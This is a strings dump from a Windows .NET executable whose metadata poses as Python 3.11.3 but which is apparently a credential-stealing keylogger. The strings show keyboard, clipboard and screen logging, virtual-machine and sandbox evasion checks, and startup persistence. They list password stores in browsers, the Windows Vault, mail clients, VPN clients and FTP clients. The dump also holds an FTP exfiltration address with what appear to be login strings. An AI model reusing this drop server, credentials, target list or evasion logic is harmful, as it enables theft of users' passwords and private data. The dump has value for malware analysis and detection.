!This program cannot be run in DOS mode.
`.rsrc
@.reloc
com.apple.Safari
Unable to resolve HTTP prox
1SPS*
KDBM(F
v4.0.30319
#Strings
! . 8 D Y a o w
#8#J#N#c#o#z#
EcXJPSf30
nh5Bx6Pz70
YX7pvp80
xpwYyC0
eAqu37OE0
00Sa88K0
paaIe0
Rlv4L3cKsv0
X8DwJA6Ow0
$$method0x6000124-1
$$method0x6000096-1
$$method0x6000087-1
$$method0x6000109-1
$$method0x6000129-1
$$method0x6000149-1
$$method0x6000269-1
$$method0x600012a-1
$$method0x600019b-1
$$method0x600010f-1
$$method0x600011f-1
HMACSHA1
J395E1
aYEXZs4ZF1
VT_UI1
K01pJtS8V1
IEnumerable`1
ICollection`1
IEnumerator`1
IList`1
CS$<>9__CachedAnonymousMethodDelegate1
get_Item1
i8jtrh6u1
$$method0x6000109-2
$$method0x6000269-2
$$method0x600011f-2
HMACSHA512
2i8CKD22
Advapi32
kernel32
Microsoft.Win32
user32
ToUInt32
ReadInt32
ToInt32
0lBt8WL6A2
F1ZuF2
VT_UI2
wlnYN2
JiIpI97S2
b0pWCfsPV2
KeyValuePair`2
Dictionary`2
rWXile2
eTp1jhwg2
get_Item2
I7C4953
lf8Bq53
HeLEj3rY7A3
Q8M2uXcrP3
Tuple`3
oasKDM8c3
XV3m3j3
get_Item3
LsFB7awx3
OrQFMOCD34
ToUInt64
ReadInt64
ToInt64
NwtQEoiJ84
VT_UI4
SY7cB3VQ4
fgFRR4
xIZmSmV4
GlSHGbj4
fEy6Lo75
XKXYG5
9oZrG5
8hdnie5
z2f5ur5
TQRvEZMt5
jQC80u5
IS_TEXT_UNICODE_ASCII16
IS_TEXT_UNICODE_REVERSE_ASCII16
ToUInt16
ReadInt16
ToInt16
HMACSHA256
KdFNh76
hAutpd26NC6
WnqjV9AQ6
bwYHgQ6
x78gQoAXpT6
wNu868n3W6
IsuWsY6
NBLDj6
CS30JJZ47
7lTsz3C7
U1VbG7
7xsjkdRi6T7
Us6adms7
mMIS88
get_UTF8
VT_UI8
VaultGetItem_WIN8
B82zrlsTpX8
I2LdqsA6kY8
zljdEDA7Pj8
tKnwLpYj8
sBESZMk8
rPqyl8
irmWJr8
dQnY09
HioIaIwSA9
Rks5EB9
RNdFBI9
<Module>
KbU30fkaD6A
xOqPKl8A
cICuqOiAA
gSIFsxW3yAA
c9kJHA
osLGFdTJA
wvXTL7vLA
l8VxpaA
5OA23xSmA
Tlon57YSprA
FuaOJtA
2Iswo2zA
DCQlAB
BCRYPT_KEY_DATA_BLOB
VT_BLOB
OtRtxOB
EjSz01DO7UB
x59cHPeB
knrd73ATrB
ZLdsrB
koWpgWsB
bYquKIdJBtB
KmrOMgzB
xjftzB
QSeICBC
BCRYPT_KEY_DATA_BLOB_MAGIC
d0dTq0dcVC
cyaZgfMWC
rz4gNabyMWC
UQ1vjC
LLKHF_EXTENDED
LLKHF_INJECTED
VT_CLSID
get_ID
set_ID
FileHandleID
fileHandleID
lpdwProcessID
processID
get_FormatID
set_FormatID
OloszDDkMD
AlQoNywMD
ue4ZVVTD
i8HcsoF5ZD
MLJDAhD
xpb1kD
FVHOfsD
lBUC53WmuD
9WSqHu3wD
mekXwD
QGQP5E
DUPLICATE_CLOSE_SOURCE
8wDdjrpzdCE
BCRYPT_CHAINING_MODE
VT_STORAGE
IlhNCvIE
INVALID_HANDLE
VT_FILETIME
IS_TEXT_UNICODE_SIGNATURE
IS_TEXT_UNICODE_REVERSE_SIGNATURE
VT_DATE
IS_TEXT_UNICODE_DBCS_LEADBYTE
7Q9fP5BF
S5REurisJF
QKct72vKF
4ouJgjLF
WdHdvVF
1gZHBybF
8SSLqJ0Q80G
acVWhI5G
BCRYPT_AUTH_MODE_CHAIN_CALLS_FLAG
w1CYDEJG
z7vpZu33UG
lEvs2ssG
STATUS_AUTH_TAG_MISMATCH
STATUS_INFO_LENGTH_MISMATCH
d2nFCEEH
k1zZOH
IS_TEXT_UNICODE_ODD_LENGTH
BCRYPT_AUTH_TAG_LENGTH
BCRYPT_OBJECT_LENGTH
41htop9hRUH
vKWCZXyUH
nWgvFw7jH
Ad3diPjH
NG3W2I
04XKKWHFI
get_ASCII
9O2OLI
MKvPRBl0gLI
HyRCQ71AlI
Q5UXZVlEOvI
ktpWXF7y7J
Ckhiu7qIEJ
ziwHYK5HXJ
8N57q4CivJ
mlqW8cczJ
qHZx3K
labLCQ6W9K
gfHAqv773CK
mctZ7EK
nzMPvDkRK
IS_TEXT_UNICODE_UNICODE_MASK
IS_TEXT_UNICODE_NOT_UNICODE_MASK
IS_TEXT_UNICODE_REVERSE_MASK
IS_TEXT_UNICODE_NOT_ASCII_MASK
R4fD2WK
EVbEwcjeK
ArK3sK
vU5PmnDCw1L
VT_DECIMAL
zyCtF1uAL
Tdx21DHL
VT_NULL
WH_KEYBOARD_LL
VT_BOOL
wL0vCTOL
rodDtbnGbL
lgBKovGgL
k7FmsUgnvL
iPaeE51lyL
LrJdOHQiX0M
r4BSMgb1M
0ayf1M
N12cXrty3M
EHHM8M
VT_VERSIONED_STREAM
VT_STREAM
BCRYPT_CHAIN_MODE_GCM
SxXLnyZuiFM
3mT9UGM
BCRYPT_AES_ALGORITHM
Eczp3RJM
Y6cnQiOM
C4rjZnIH5UM
ZiDvRUM
tjnxYM
HRyucM
krS9YhbzklM
NmrUKOnmM
eNQKLIOxM
NIicFpp65N
mMwj22uuv5N
pMSX27N
18LvJFqybEN
BCRYPT_INIT_AUTH_MODE_INFO_VERSION
HC_ACTION
rsFgm2kRN
efNGEnu2FVN
LLKHF_ALTDOWN
WM_SYSKEYDOWN
WM_KEYDOWN
Ow336QYN
vjlkjZN
zOhvyeN
ck4V1O
TUWcwX7O
fzIM6RnDDAO
cVYSCO
J7cZsCO
System.IO
54i1sQO
mdclsGPVTO
hQX5K6mFPoO
MqYYWtsO
VoGotzOma2P
eibQkIkB6P
q2QnuAP
BCRYPT_PAD_OAEP
CaQaSTZEP
TacYe29HP
GrqWlJP
MmMsED74QP
WM_SYSKEYUP
WM_KEYUP
LLKHF_UP
mk5KbiXP
Flp5aP
OzGLmfP
WOMwZkRJxP
QsYdMu5Q
zKzVMcP19Q
zEZxYhAZQ
pkBzt1AR
MS_PRIMITIVE_PROVIDER
osHnPLR
VT_ERROR
VT_VECTOR
VT_BSTR
VT_LPSTR
VT_LPWSTR
L8AsNoSmR
aKO7qR
Quq9Zp8iwR
IS_TEXT_UNICODE_STATISTICS
IS_TEXT_UNICODE_REVERSE_STATISTICS
AlM6STrWCS
IS_TEXT_UNICODE_NULL_BYTES
IS_TEXT_UNICODE_CONTROLS
IS_TEXT_UNICODE_REVERSE_CONTROLS
yNbHMkNloOS
IS_TEXT_UNICODE_ILLEGAL_CHARS
DUPLICATE_SAME_ACCESS
ERROR_SUCCESS
STATUS_SUCCESS
BCRYPT_PAD_PSS
ZN20YfKFZS
agmsqTx3aeS
3O48G6FqS
2xSIbh3T
VT_UINT
VT_INT
LxDsQT
LAkLPYPEvRT
kyNPBaT
X7jefdT
4tNLEcns7hT
LjzoJ1XlT
mIpGNNslrT
qJcrd1U
xljC6U
jhdI0GU
f9nxqJgTQGU
kS4fWhJ3tYU
JyqUluzjhU
get_IV
set_IV
u2WcURV
tKlBTjV
fRNGEXLqV
hhOsAV7zV
CxkQ7W
LND6xHW
STATUS_BUFFER_OVERFLOW
KiArDANEXW
md3EesQXXW
HeErxv4aW
klOC6JwMX
VT_ARRAY
rl5gxTYGY
12rLuugUIY
XmvXLY
VT_EMPTY
nSZ7uKzpfY
zbgetlxY
of5ziCZ
Jzn8McTdZEZ
RNalouQwLFZ
gIFuqvJ7WZ
PGxH3aNcZ
tcN4ryHLrZ
dnQtvZ
value__
SIbaC5lo9a
cFgkdsNIa
T4Au29ea
kwh1KAVosa
iI6Wu4ta
get_Data
set_Data
cbData
ProtectedData
cbAuthData
pbAuthData
PropertyData
SetQuota
WBL2ZRmo1za
TqeSc0oEb
CBjXLNb
NIRUCQb
D1FfRb
eyb4vLcVb
PublicIpAddressGrab
OBIH8Jib
mscorlib
cVEZqb
DVeazYGY8c
MUPk4f8Sc
System.Collections.Generic
Microsoft.VisualBasic
WndProc
HookProc
FromFileTimeUtc
j7YQ1W1d
9Ssbs7KH4d
qwJHqh5Ad
get_Id
SchemaId
schemaId
pszAlgId
HookId
GetWindowThreadProcessId
processId
SchemaElementId
PageExecuteRead
OpenRead
FileMapRead
VirtualMemoryRead
CreateThread
0WU3Olx4Ucd
44kEC7eXed
lpcbNeeded
DomainExtended
SHA1Managed
RijndaelManaged
add_Changed
remove_Changed
get_LastModified
set_LastModified
_lastModified
Interlocked
set_Enabled
get_IsEnabled
set_IsEnabled
_enabled
Undefined
lpOverlapped
samDesired
add_Elapsed
get_LastAccessed
set_LastAccessed
_lastAccessed
get_Reserved
reserved
TorPid
activeWindowPid
pPackageSid
row_id
get_IsInvalid
get_Guid
vaultGuid
PcHwid
7Nomjd
<ID>k__BackingField
<FormatID>k__BackingField
<Data>k__BackingField
<LastModified>k__BackingField
<IsEnabled>k__BackingField
<LastAccessed>k__BackingField
<Password>k__BackingField
<password>k__BackingField
<PropertyStorage>k__BackingField
<Name>k__BackingField
<FileName>k__BackingField
<ApplicationName>k__BackingField
<Username>k__BackingField
<username>k__BackingField
<Type>k__BackingField
<type>k__BackingField
<TypedPropertyValue>k__BackingField
<Size>k__BackingField
<IsRunning>k__BackingField
<Path>k__BackingField
<hostmask>k__BackingField
<Version>k__BackingField
<Application>k__BackingField
<Description>k__BackingField
<user>k__BackingField
<hoster>k__BackingField
<Tasks>k__BackingField
<Contacts>k__BackingField
<objects>k__BackingField
<Accounts>k__BackingField
<Keys>k__BackingField
<Lenght>k__BackingField
<Host>k__BackingField
<GuidMasterKey>k__BackingField
GetField
TrimEnd
ReadToEnd
AppEnd
Append
get_Millisecond
GetUpperBound
GetLowerBound
PiF4Hod
set_Method
method
MgKXXsv2qd
Clipboard
get_Password
set_Password
DomainPassword
FtpPassword
get_password
set_password
9aQaTxJZawd
fHdO1e
kh4e0t55e
84Vk5We
GJLHrcn9ae
Replace
DeleteBackspace
QueryDosDevice
hInstance
IdentityReference
Sequence
cbNonce
pbNonce
Resource
XZVwDiThde
vkCode
wScanCode
scanCode
keyCode
set_Mode
FileMode
ShareMode
PaddingMode
CryptoStreamMode
CipherMode
SelectSingleNode
XmlNode
get_Unicode
get_BigEndianUnicode
IsTextUnicode
F3ejZfe
FromImage
SectionImage
get_PropertyStorage
set_PropertyStorage
SerializedPropertyStorage
SendMessage
AddRange
CompareExchange
CredentialCache
SectionNoCache
6iWMhie
EndInvoke
BeginInvoke
GetEnvironmentVariable
SetEnvironmentVariable
IEnumerable
IDisposable
ToDouble
get_Handle
RuntimeFieldHandle
hSourceHandle
SafeHandle
GetModuleHandle
RuntimeTypeHandle
ReleaseHandle
CloseHandle
DuplicateHandle
CreateHandle
GetTypeFromHandle
hSourceProcessHandle
hTargetProcessHandle
lpTargetHandle
bInheritHandle
vaultHandle
activeWindowHandle
handle
Rectangle
ToSingle
CreateFile
hTemplateFile
DeleteFile
WriteFile
MoveFile
MapViewOfFile
UnmapViewOfFile
lastTitle
activeWindowTitle
lphModule
get_MainModule
ProcessModule
get_Name
set_Name
lpDeviceName
get_FileName
set_FileName
GetModuleFileName
lpExistingFileName
lpFileName
GetFileName
lpNewFileName
_fileName
get_ModuleName
lpModuleName
lpBaseName
baseName
lpValueName
StartupRegName
rootPathName
get_OSFullName
get_FullName
OperatingSystemName
get_ApplicationName
set_ApplicationName
StartupInstallationName
lpName
lpAppName
get_UserName
get_ComputerName
ThisComputerName
ProcessorName
get_ProcessName
processName
StartupEnvName
GetProcessesByName
lpKeyName
pszCredentialFriendlyName
StartupDirectoryName
GetDirectoryName
astable_name
item_name
Filename
filename
get_Username
set_Username
get_username
set_username
DateTime
GetLastAccessTime
dwTime
AppendLine
get_NewLine
Combine
LocalMachine
Escape
Unescape
DataProtectionScope
get_Type
set_Type
pszBlobType
GetFileType
MimeType
ValueType
LogType
SecurityProtocolType
GetType
item_type
get_type
set_type
FileShare
Compare
System.Core
PtrToStructure
get_InvariantCulture
Capture
aEcDse
HttpWebResponse
GetResponse
Dispose
Reverse
X509Certificate
GenericCertificate
DomainCertificate
Create
KBDLLHookProcDelegate
MulticastDelegate
Terminate
PcState
GetKeyboardState
lpKeyState
GetKeyState
Delete
PageReadWrite
PageExecuteReadWrite
nNumberOfBytesToWrite
FileMapWrite
VirtualMemoryWrite
Remote
STAThreadAttribute
CompilerGeneratedAttribute
GuidAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
SecuritySafeCriticalAttribute
ExtensionAttribute
AssemblyFileVersionAttribute
AssemblyDescriptionAttribute
FlagsAttribute
CompilationRelaxationsAttribute
ReliabilityContractAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
ParamArrayAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
SuppressUnmanagedCodeSecurityAttribute
set_UseShellExecute
FileMapExecute
ReadByte
ToByte
get_Value
HandleValue
TryGetValue
get_TypedPropertyValue
set_TypedPropertyValue
GetPropertyValue
set_KeepAlive
Remove
SectionReserve
6MECAym9ye
get_Size
set_Size
dataSize
cbSize
get_StorageSize
lpFileSize
get_NameSize
volumeNameSize
nFileSystemNameSize
SQLDataTypeSize
get_StoreSize
get_ValueSize
get_HashSize
set_BlockSize
chunkSize
get_KeySize
Serialize
Deserialize
Initialize
Finalize
Synchronize
page_size
Resize
LGBZ4N2f
KB9l5f
DajtgsRr7f
f45b853c-c9d3-495e-9acb-d41a4a90029f
SSUOIf
7HKzdzMf
SizeOf
get_ItemOf
LastIndexOf
JcSpTf
0kv45df
cchBuff
rUtUljf
lastInputInf
kkijn2ZGtf
OotxUpBfdvf
7AvtI2g
1B0nEGX4g
BmKK00Jg
pn5rjBVLg
k06XYg
RLYLbg
get_Jpeg
mJyhLjdIlgg
lI1hjg
System.Threading
get_Padding
set_Padding
UTF8Encoding
encoding
System.Drawing.Imaging
get_IsRunning
set_IsRunning
CreateFileMapping
FromBase64String
ToBase64String
EscapeDataString
UnescapeDataString
DownloadString
lpReturnedString
GetPrivateProfileString
ToString
GetString
OctetString
BitString
Substring
System.Drawing
get_Msg
MJahi3tg
fkXeebyg
8cGSzYZdDh
yUZX3eTIANh
VdQfqTh
3z2Db2eh
7HTzxy8eh
dwMaximumSizeHigh
dwFileOffsetHigh
zVk0Bnh
ComputeHash
get_Path
set_Path
SystemAppdataPath
get_ExecutablePath
AsmFilePath
AppStartupFullPath
GetTempPath
GetFolderPath
lpTargetPath
StartupDirectoryPath
get_Width
get_Length
MaximumLength
dwMinLength
SystemInformationLength
ObjectInformationLength
set_MaxJsonLength
ReturnLength
maximumComponentLength
set_ContentLength
GetWindowTextLength
dwMaxLength
EndsWith
StartsWith
957igSUKEwh
0efKzh
IegtK1i
VZcY2TL6i
gXgfro9i
kVDOAGi
kSYgeEpJi
QgVZeJKi
PtrToStringUni
StringToHGlobalUni
b5NlMti
BlNZxi
qhuYL5j
zsI31JPn7j
RiZG8j
5Luq8j
e0DDi09j
EYg6TkNjDj
I1dKijItuEj
9rcPgpcYUj
TlznICaj
9sTNyaj
E6qhzdj
objrij
qv7uPYkj
M9tzuj
jq2yFTohxj
1ZPzH7Auxj
NKFRAk
UE1xZLk
WT2s7l2Pk
S1oiFUk
AsyncCallback
RemoteCertificateValidationCallback
get_ServerCertificateValidationCallback
set_ServerCertificateValidationCallback
callback
get_CapsLock
TransformFinalBlock
TransformBlock
u84KX9jk
idHook
_clipboardHook
_keyboardHook
BN5nXLaspk
get_hostmask
set_hostmask
3wqNuk
1NkZsfxk
4eoD3mM5f4l
tGtfh96Hl
LYHEPnHWl
AllocHGlobal
FreeHGlobal
Illegal
Marshal
NetworkCredential
Decimal
System.Security.Principal
set_Interval
ScreenInterval
KeyloggerInterval
g6mmegDcl
Rijndael
cbLabel
pbLabel
System.ComponentModel
EnableTorPanel
Kernel32.dll
kernel32.dll
User32.dll
user32.dll
vaultcli.dll
psapi.dll
ntdll.dll
bcrypt.dll
System.Xml
U2TluSnl
set_SecurityProtocol
Control
U6WwGh8rwl
YT40m9m
sZW9OfUm
FileStream
get_BaseStream
GetResponseStream
CryptoStream
GetRequestStream
MemoryStream
get_LParam
get_WParam
get_Param
lParam
wParam
get_Item
set_Item
VaultGetItem
vaultItem
OperatingSystem
yFP1gm
HmacAlgorithm
SymmetricAlgorithm
phAlgorithm
KeyedHashAlgorithm
algorithm
Random
frc5pm
ICryptoTransform
Maximum
root_num
CJ4H8ixm
ECqAbCy1n
N2vtlEpigDn
CdF0tHpUPHn
5io7sNsMn
ToBoolean
IsLittleEndian
CopyFromScreen
get_PrimaryScreen
dVjkZ3EEsen
lpNumberOfBytesWritten
X509Chain
ChangeClipboardChain
W5Hei4ln
Extension
get_OSVersion
get_Version
set_Version
dwInfoVersion
get_Application
set_Application
get_Location
ObjectDataInformation
SystemRegistryQuotaInformation
SystemBasicInformation
ObjectBasicInformation
QueryLimitedInformation
SystemPerformanceInformation
SystemProcessorPerformanceInformation
SystemLookasideInformation
SystemHandleInformation
ObjectNameInformation
GetVolumeInformation
ObjectTypeInformation
ObjectAllInformation
NtQuerySystemInformation
SystemExceptionInformation
SystemProcessInformation
ObjectInformation
SetInformation
SystemInterruptInformation
SystemTimeOfDayInformation
QueryInformation
VirtualMemoryOperation
pszImplementation
System.Globalization
System.Web.Script.Serialization
System.Reflection
PropertyDataCollection
ValueCollection
MatchCollection
GroupCollection
ManagementObjectCollection
KeyCollection
set_Position
CreationDisposition
SearchOption
Win32Exception
CryptographicException
ArgumentOutOfRangeException
ArgumentException
get_Description
set_Description
get_StatusDescription
_description
System.Runtime.ConstrainedExecution
StringComparison
add_KeyDown
remove_KeyDown
get_CtrlKeyDown
get_ShiftKeyDown
get_AltKeyDown
Unknown
IBrOWU70o
K19kg9EiH7o
O5BwsOOWVEo
8a78puGo
MJafDpStHo
fDSnywze0Mo
GzML2No
CompareTo
CopyTo
lYfFVToWo
lastInPutNfo
dwExtraInfo
ImageCodecInfo
FieldInfo
FileInfo
CultureInfo
pPaddingInfo
FileSystemInfo
MemberInfo
ComputerInfo
get_StartInfo
ProcessStartInfo
GetLastInputInfo
DirectoryInfo
VLAqtO9Hho
yzQMto
VEp60ehGmxo
R6XjuiiQvzo
F0ZlIe1p
XieShZ8p
dVDn9xjfMp
add_KeyUp
remove_KeyUp
dwNumberOfBytesToMap
l6PWEVlPap
Bitmap
SLcTtWfZYhp
TimeStamp
Xtcnk2pp
LocalApp
AppAddStartup
HideFileStartup
6UbWi7Zdwp
sFTRPNCQJxp
UKpG6q
1WwIEQ4j8q
i5MzHhWtWdq
yyE6K0MxZdq
System.Linq
Hju7Er
hXiBK8Eo6Fr
x2d7TcFr
C8NeIvjIr
vZPb9pSKr
qBj1ybXr
ToChar
lpChar
DirectorySeparatorChar
ObjectTypeNumber
volumeSerialNumber
StreamReader
TextReader
BinaryReader
SHA1CryptoServiceProvider
MD5CryptoServiceProvider
RNGCryptoServiceProvider
TripleDESCryptoServiceProvider
BCryptCloseAlgorithmProvider
BCryptOpenAlgorithmProvider
IFormatProvider
StringBuilder
SpecialFolder
sender
Encoder
volumeNameBuffer
fileSystemNameBuffer
buffer
ServicePointManager
Integer
EnableClipboardLogger
EnableScreenLogger
_screenLogger
_keyLogger
EnableKeylogger
ManagementObjectSearcher
ObjectIdentifier
SecurityIdentifier
ElapsedEventHandler
LogTimer
ToUpper
FtpUser
CurrentUser
get_user
set_user
EncoderParameter
Object_Pointer
BitConverter
get_hoster
set_hoster
BinaryFormatter
SetClipboardViewer
ToLower
JavaScriptSerializer
get_Major
get_Minor
GetLastWin32Error
GetLastError
Authenticator
IEnumerator
ManagementObjectEnumerator
GetEnumerator
RandomNumberGenerator
.cctor
Monitor
CreateDecryptor
CreateEncryptor
passwordVaultPtr
ReadIntPtr
NVm307gC2s
70uJPKsRQ7s
gHMeYKg5Js
cXu1Ss
4FEi6OtSs
Graphics
System.Diagnostics
get_Bounds
Microsoft.VisualBasic.Devices
System.Runtime.InteropServices
System.Runtime.CompilerServices
GetInstances
get_ChildNodes
Matches
EnableCookies
GetDirectories
master_table_entries
get_Properties
ExpandEnvironmentVariables
GetFiles
EnumProcessModules
NumberStyles
GetSubKeyNames
field_names
ReadAllLines
GetProcesses
System.Security.Cryptography.X509Certificates
FlagsAndAttributes
lpFileMappingAttributes
SecurityAttributes
FileBytes
Rfc2898DeriveBytes
ReadAllBytes
BufferBytes
GetBytes
db_bytes
get_Values
GetLogicalDrives
fileSystemFlags
dwFlags
ElapsedEventArgs
ik2XJhs
sBMUaVhs
6tqvjs
bcBTfme4ks
get_Ticks
get_Tasks
set_Tasks
ICredentials
set_Credentials
get_DefaultCredentials
Equals
CreateParams
VaultEnumerateItems
System.Windows.Forms
Contains
System.Web.Extensions
System.Text.RegularExpressions
iterations
System.Collections
set_MaximumAutomaticRedirections
StringSplitOptions
RegexOptions
options
get_Groups
get_Chars
GetImageEncoders
System.Timers
RuntimeHelpers
EncoderParameters
SslPolicyErrors
SystemInformationClass
ObjectInformationClass
ManagementClass
dwDesiredAccess
GrantedAccess
FileAccess
FileMapAllAccess
processAccess
get_Success
CreateProcess
hProcess
OpenProcess
GetCurrentProcess
lpBaseAddress
PublicIpAddress
get_Contacts
set_Contacts
EnableContacts
get_objects
set_objects
VaultEnumerateVaults
pPropertyElements
set_Arguments
get_Accounts
set_Accounts
get_Exists
get_Keys
set_Keys
get_ModifierKeys
XxkerfgFt
Concat
AppendFormat
ImageFormat
Subtract
VT_BLOB_Object
VT_STREAMED_Object
VT_STORED_Object
ManagementBaseObject
hFileMappingObject
hObject
ManagementObject
cbKeyObject
pbKeyObject
NtQueryObject
object
Collect
set_AllowAutoRedirect
flProtect
Unprotect
System.Net
offset
get_Height
get_Lenght
set_Lenght
op_Explicit
HostEdit
SectionCommit
WaitForExit
cbSalt
SXYlflt
VaultOpenVault
get_Default
lpDefault
pcbResult
IAsyncResult
phkResult
result
UnsignedInt
ToUpperInvariant
set_UserAgent
PublicUserAgent
WebClient
System.Management
pResourceElement
XmlElement
pAuthenticatorElement
pIdentityElement
dwIncrement
sql_statement
Environment
XmlDocument
get_Parent
GetParent
get_Current
CheckRemoteDebuggerPresent
isDebuggerPresent
content
get_Count
get_HandleCount
get_TickCount
vaultItemCount
set_IterationCount
dwPropertiesCount
vaultCount
BCryptDecrypt
BCryptEncrypt
TrimStart
AppStart
Convert
UnsignedShort
FtpWebRequest
HttpWebRequest
XmlNodeList
ToList
MozillaBrowserList
ChromiumBrowserList
get_Host
set_Host
FtpHost
set_Timeout
GetKeyboardLayout
dwLayout
cbInput
pbInput
cbOutput
pbOutput
get_StandardOutput
set_RedirectStandardOutput
MoveNext
System.Text
LastCopiedText
KeylogText
ReadAllText
AppendAllText
get_InnerText
GetText
GetWindowText
Log_text
cbMacContext
pbMacContext
sRZaulE5u
My5cQgbAu
TqWygenoBu
rZwyBu
TgDLiyEK8Mu
wzBzXu
gZmhBEZu
6z23BYthdu
zEfsmMoZiu
NYRUEChuqnu
CsvxrnfLmFv
DBbEEZffv
l8s6hv
xk8mrlv
rpaCeuHknv
v9hY5ov
ZeHSKw
JszXNw
263J4mSn7dw
4piRkmw
dwMaximumSizeLow
dwFileOffsetLow
get_Now
GetForegroundWindow
NativeWindow
set_CreateNoWindow
5Wb4gHA3x
mt7yti6x
ToUnicodeEx
GetModuleFileNameEx
RegQueryValueEx
GetFileSizeEx
y8R1iEx
UnhookWindowsHookEx
SetWindowsHookEx
CallNextHookEx
MaximumEx
RegOpenKeyEx
f95hTIx
PK00L2k9Jx
I49Pqq8kZOx
v9sIVx
ucchMax
ku98cx
BufferEndIndex
BlockIndex
BufferStartIndex
PcsBKGJMkjx
9MXVC402izx
pAYSF70y
AW7jcBHtM0y
kav0K2y
CqT5MU2y
1KHFQsGt8y
PBoD3Dy
9xBv1dYJy
hwJ4huLy
IfMEuvRCQy
ProtectedArray
ToByteArray
InitializeArray
ToArray
ToCharArray
Consistency
get_Key
set_Key
OpenSubKey
subKey
RegCloseKey
get_GuidMasterKey
set_GuidMasterKey
_guidMasterKey
ContainsKey
wVirtKey
hImportKey
BCryptImportKey
BCryptDestroyKey
RegistryKey
_wsftpkey
System.Security.Cryptography
jLamSjy
GetExecutingAssembly
PageReadonly
Multiply
PageWriteCopy
BlockCopy
FileMapCopy
RezVry
System.Runtime.Serialization.Formatters.Binary
AmountOfMemory
get_TotalPhysicalMemory
Directory
Registry
get_Capacity
Quality
op_Equality
op_Inequality
System.Security
System.Net.Security
Identity
IsNullOrEmpty
BCryptSetAlgorithmProperty
BCryptGetProperty
BCryptSetProperty
pszProperty
SgffWz
Nw0koHnz
fAAo70ioz
eKIvIPqz
cLMarz
Ty8Omwxz
$ac817265-7162-4840-9799-486144a753d9
>Copyright (c) Python Software Foundation. All rights reserved.
Python Software Foundation
1.0.0.0
Python 3.11.3 (64-bit)
WrapNonExceptionThrows
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
t t t!t"t#t$t%t&t't(t)t*t+t,t-t.t/t0t1t2t3t4t5t6t7t8t9t:t;t<t=t>t?t@tAtBtEtFtGtHtItLtiy
k#n+n9
5 6 7!8"9#:$;%<&='>(?)@*A+B,C-D0E4F5G6H7I8J9L:O;P=RAUD[F`HfLxRyVzX{[|_}b
CBDBJIKIRQWVXVYV_^fehgigjgkglgmgpo
yyyy_MM_dd_HH_mm_ss
/log.tmp
<html>
</html>
yyyy-MM-dd HH:mm:ss
text/plain
Contacts_
<br>CPU:
<br>OSFullName:
MM/dd/yyyy HH:mm:ss
IP Address:
<br>RAM:
<br>Computer Name:
Time:
<br>User Name:
OSFullName:
User Name:
Recovered!
Time:
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
ftp://176.65.144.3
Believe
Believe56@@
appdata
eXCXES
eXCXES.exe
\drivers\etc\hosts
http://ip-api.com/line/?fields=hosting
Sf2.dll
snxhk.dll
SxIn.dll
cmdvrt32.dll
SbieDll.dll
Manufacturer
microsoft corporation
VIRTUAL
vmware
VirtualBox
root\CIMV2
SELECT * FROM Win32_VideoController
VMware
Select * from Win32_ComputerSystem
]</b> (
{KEYUP}
{ALT+TAB}
{HOME}
{BACK}
{KEYLEFT}
{KEYDOWN}
{ENTER}
{ALT+F4}
{KEYRIGHT}
{Insert}
control
{CTRL}
{NumLock}
{CAPSLOCK}
{PageDown}
{PageUp}
"
<br><hr>Copied Text: <br>
logins
IE/Edge
2F1A6504-0641-44CF-8BB5-3612D865F2E5
Windows Secure Note
3CCD5499-87A8-4B10-A215-608888DD3B55
Windows Web Password Credential
154E23D0-C644-4E6F-8CE6-5069272F999F
Windows Credential Picker Protector
4BF4C442-9B8A-41A0-B380-DD4A704DDB28
Web Credentials
77BC582B-F0A6-4E15-4E80-61736B6F3B29
Windows Credentials
E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
Windows Domain Certificate Credential
3E0E35BE-1B77-43E7-B873-AED901B6275B
Windows Domain Password Credential
3C886FF3-2669-4AA2-A8FB-3F6759A77548
Windows Extended Credential
00000000-0000-0000-0000-000000000000
SchemaId
pResourceElement
pIdentityElement
pPackageSid
pAuthenticatorElement
UC Browser
UCBrowser\
Login Data
journal
wow_logins
Safari for Windows
\Common Files\Apple\Apple Application Support\plutil.exe
\Apple Computer\Preferences\keychain.plist
<dict>
<array>
<string>
</string>
<data>
</data>
-convert xml1 -s -o "
\fixed_keychain.xml"
\Microsoft\Credentials\
\Microsoft\Protect\
credential
QQ Browser
\EncryptedStorage
Tencent\QQBrowser\User Data
\Default\EncryptedStorage
Profile
entries
category
Password
password_value
IncrediMail
SmtpPassword
PopPassword
Software\IncrediMail\Identities\
\Accounts_New
SmtpServer
EmailAddress
Eudora
Software\Qualcomm\Eudora\CommandLine\
current
Settings
SavePasswordText
ReturnAddress
Falkon Browser
\falkon\profiles\
startProfile=([A-z0-9\/\.\"]+)
profiles.ini
\browsedata.db
autofill
ClawsMail
\clawsrc
\Claws-mail
passkey0
master_passphrase_salt=(.+)
master_passphrase_pbkdf2_rounds=(.+)
\accountrc
smtp_server
address
account
\passwordstorerc
{(.*),(.*)}(.*)
Flock Browser
APPDATA
\Flock\Browser\
signons3.txt
DynDns
ALLUSERSPROFILE
Dyn\Updater\config.dyndns
username=
password=
https://account.dyn.com/
t6KzXhCh
Dyn\Updater\daemon.cfg
global
accounts
account.
username
password
Psi/Psi+
\accounts.xml
\Psi\profiles
\Psi+\profiles
OpenVPN
Software\OpenVPN-GUI\configs
Software\OpenVPN-GUI\configs\
auth-data
entropy
remote
USERPROFILE
\OpenVPN\config\
NordVPN
NordVpn.exe*
user.config
//setting[@name='Username']/value
//setting[@name='Password']/value
Private Internet Access
%ProgramW6432%
Private Internet Access\data
ProgramFiles(x86)
\Private Internet Access\data
\account.json
.*"username":"(.*?)"
.*"password":"(.*?)"
privateinternetaccess.com
FileZilla
\FileZilla\recentservers.xml
<Server>
<Host>
</Host>
<Port>
</Port>
<User>
</User>
<Pass encoding="base64">
</Pass>
<Pass>
CoreFTP
SOFTWARE\FTPWare\COREFTP\Sites
hdfzpysvpzimorhk
